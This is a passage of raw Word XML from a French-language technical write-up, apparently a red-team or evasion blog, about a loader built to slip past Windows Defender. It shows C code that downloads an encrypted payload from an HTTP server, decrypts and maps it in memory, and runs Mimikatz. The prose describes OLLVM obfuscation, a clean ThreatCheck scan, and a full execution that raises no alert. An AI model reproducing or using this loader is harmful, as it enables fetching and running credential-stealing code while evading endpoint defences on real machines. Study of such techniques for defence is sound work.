          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hInternet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, NULL, 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D1DD0"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INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, 0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E1DB3CA"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
    <w:p w14:paraId="348736B5"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PEBuff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (unsigned char</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL, PAYLOAD_SIZE + 4096,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424A8DED"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MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4133A493"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
    <w:p w14:paraId="753D6F52"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DWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>totalRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bytesRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="50E48769"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while (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>totalRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; PAYLOAD_SIZE) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2BB344"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p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InternetReadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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PEBuff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>totalRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, 4096, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bytesRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="298915AA"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if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bytesRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 0) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>break;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B10EC0F"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totalRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bytesRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="233CB200"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
    <w:p w14:paraId="6A856677"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
    <w:p w14:paraId="1AB8D37A"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p_InternetCloseHandle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F95A68B" w14:textId="77777777" w:rsidR="000C1804" w:rsidRPr="00E61249" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p_InternetCloseHandle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hInternet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B22F750" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TRUE;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3776A994" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5473CC" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68EB3B90" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le binaire sur disque passe de 4.4 MB (avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> embarqué) à quelques KB. Plus de blob haute entropie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2358F714" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Résultat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270B8618" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recompilation avec OLLVM, scan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> final :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002419AB" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14042F76" wp14:editId="40D4A974">
            <wp:extent cx="6256020" cy="748665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="481946840" name="Image 481946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07654" cy="754844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F96B86" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ThreatCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> : aucune menace détectée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129EA237" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le loader passe Defender sans aucune détection. L'exécution complète (serveur HTTP + loader + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) fonctionne sans déclencher d'alerte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1D21C" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Test d'exécution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A663B0" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour valider le bypass, on héberge le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> chiffré sur un serveur HTTP :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B1B20" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665C5957" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDC39B7" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le loader est exécuté sur la machine cible. Il télécharge le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, le déchiffre en mémoire, mappe le PE, et redirige le main thread vers l'entry point de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Defender ne déclenche aucune alerte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F1CE3" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Récapitulatif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79241098" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Le bypass de la détection statique a nécessité trois couches combinées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0C1804" w14:paraId="50FC79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79D9924" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Couche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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408F914" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3426"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7486FFA" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cible</w:t>
